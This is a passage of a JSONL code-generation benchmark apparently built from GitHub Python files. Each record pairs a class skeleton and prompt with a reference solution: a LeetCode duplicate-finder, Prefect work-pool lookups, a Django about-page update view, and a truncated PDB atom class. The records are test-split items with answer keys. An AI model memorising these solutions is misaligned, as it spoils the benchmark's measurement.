in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n<|end_body_2|>\n", "revision_id": "c92a5ddcc56e3f69be1e6fb25e9c8ed277e57ee0", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n <|body_0|>\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n <|body_1|>\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n find_set = set()\n for num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n", "source": "the_stack_v2_python_sparse", "source_path": "SwordOffer/SwordOffer_03.py", "source_repo": "EachenKuang/LeetCode", "split": "test", "star_events_count": 28} {"blob_id": "597b1d2e98a7ec1dbf7cec6655f6169114c70831", "bodies": ["work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\nif not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\nreturn work_pool.id", "work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\nif not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\nreturn work_pool.default_queue_id", "work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\nif not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\nreturn work_pool_queue.id"], "bodies_text": "<|body_start_0|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n<|end_body_0|>\n\n<|body_start_1|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n<|end_body_1|>\n\n<|body_start_2|>\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n<|end_body_2|>\n", "class_docstring": "", "class_name": "WorkerLookups", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass WorkerLookups:\n\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_0|>\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_1|>\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n<|end_body_0|>\n\n<|body_start_1|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n<|end_body_1|>\n\n<|body_start_2|>\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000346", "length_bytes": 16683, "license_type": "permissive", "methods": [{"docstring": "Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "name": "_get_work_pool_id_from_name", "signature": "async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID"}, {"docstring": "Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "name": "_get_default_work_pool_queue_id_from_work_pool_name", "signature": "async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str)"}, {"docstring": "Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "name": "_get_work_pool_queue_id_from_name", "signature": "async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007170", "prompt": "Implement the Python class `WorkerLookups` described below.\n\nClass description:\nImplement the WorkerLookups class.\n\nMethod signatures and docstrings:\n- async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID: Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str): Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID: Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "prompted_full_text": "Implement the Python class `WorkerLookups` described below.\n\nClass description:\nImplement the WorkerLookups class.\n\nMethod signatures and docstrings:\n- async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID: Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str): Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID: Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n\n<|skeleton|>\nclass WorkerLookups:\n\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_0|>\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_1|>\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n<|end_body_0|>\n\n<|body_start_1|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n<|end_body_1|>\n\n<|body_start_2|>\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n<|end_body_2|>\n", "revision_id": "355d5de4b29720d9a81c12fd77ef734fc2c1733b", "skeleton": "<|skeleton|>\nclass WorkerLookups:\n\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_0|>\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_1|>\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class WorkerLookups:\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n", "source": "the_stack_v2_python_sparse", "source_path": "src/prefect/orion/api/workers.py", "source_repo": "Clearcover/prefect", "split": "test", "star_events_count": 1} {"blob_id": "6cb4d0b6f841d67a1c2db122b373533917f7531b", "bodies": ["user_prof = UserProfile.objects.get(user=request.user)\ntry:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\nexcept ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))", "user_prof = UserProfile.objects.get(user=request.user)\nabout_person = AboutPerson.objects.get(slug=slug)\nform = AboutFunderForm(request.POST, request.FILES)\nif form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\nelse:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})"], "bodies_text": "<|body_start_0|>\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n<|end_body_0|>\n\n<|body_start_1|>\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n<|end_body_1|>\n", "class_docstring": "A class that represents the update page for an about page entry", "class_name": "AboutUpdateView", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AboutUpdateView:\n \"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n <|body_0|>\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n<|end_body_0|>\n\n<|body_start_1|>\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000347", "length_bytes": 11714, "license_type": "no_license", "methods": [{"docstring": "The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry", "name": "get", "signature": "def get(self, request, slug)"}, {"docstring": "The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful", "name": "post", "signature": "def post(self, request, slug)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002712", "prompt": "Implement the Python class `AboutUpdateView` described below.\n\nClass description:\nA class that represents the update page for an about page entry\n\nMethod signatures and docstrings:\n- def get(self, request, slug): The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\n- def post(self, request, slug): The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful", "prompted_full_text": "Implement the Python class `AboutUpdateView` described below.\n\nClass description:\nA class that represents the update page for an about page entry\n\nMethod signatures and docstrings:\n- def get(self, request, slug): The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\n- def post(self, request, slug): The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\n\n<|skeleton|>\nclass AboutUpdateView:\n \"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n <|body_0|>\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n<|end_body_0|>\n\n<|body_start_1|>\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n<|end_body_1|>\n", "revision_id": "8296c49dfa8771b47965c24b6b49a2b6e8ace6cf", "skeleton": "<|skeleton|>\nclass AboutUpdateView:\n \"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n <|body_0|>\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AboutUpdateView:\n \"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\"\"\"\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n", "source": "the_stack_v2_python_sparse", "source_path": "relevate_web_app/apps/contribution/views/about_views.py", "source_repo": "jhock/Relevate", "split": "test", "star_events_count": 1} {"blob_id": "5505e0105bfe499a17204209f0bd67b21a8c79ab", "bodies": ["self.type = 'ATOM'\nself.serial = serial\nself.name = name\nself.altLoc = ''\nself.resName = resName\nself.chainID = ''\nself.resSeq = 1\nself.iCode = ''\nself.x = x\nself.y = y\nself.z = z\nself.occupancy = 0.0\nself.tempFactor = 0.0\nself.segID = ''\nself.element = ''\nself.charge = ''\nself.ffcharge = 0.0\nself.radius = 0.0\nself.intrabonds = []\nself.residue = None\nself.refdistance = None", "state = 0\nif self.name in BACKBONE:\n state = 1\nreturn state"], "bodies_text": "<|body_start_0|>\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n<|end_body_0|>\n\n<|body_start_1|>\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n<|end_body_1|>\n", "class_docstring": "Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.", "class_name": "DefinitionAtom", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\"\"\"\n <|body_0|>\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n<|end_body_0|>\n\n<|body_start_1|>\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000348", "length_bytes": 12649, "license_type": "permissive", "methods": [{"docstring": "Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)", "name": "__init__", "signature": "def __init__(self, serial, name, resName, x, y, z)"}, {"docstring": "Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false", "name": "isBackbone", "signature": "def isBackbone(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002962", "prompt": "Implement the Python class `DefinitionAtom` described below.\n\nClass description:\nClass DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\n\nMethod signatures and docstrings:\n- def __init__(self, serial, name, resName, x, y, z): Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\n- def isBackbone(self): Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false", "prompted_full_text": "Implement the Python class `DefinitionAtom` described below.\n\nClass description:\nClass DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\n\nMethod signatures and docstrings:\n- def __init__(self, serial, name, resName, x, y, z): Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\n- def isBackbone(self): Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if 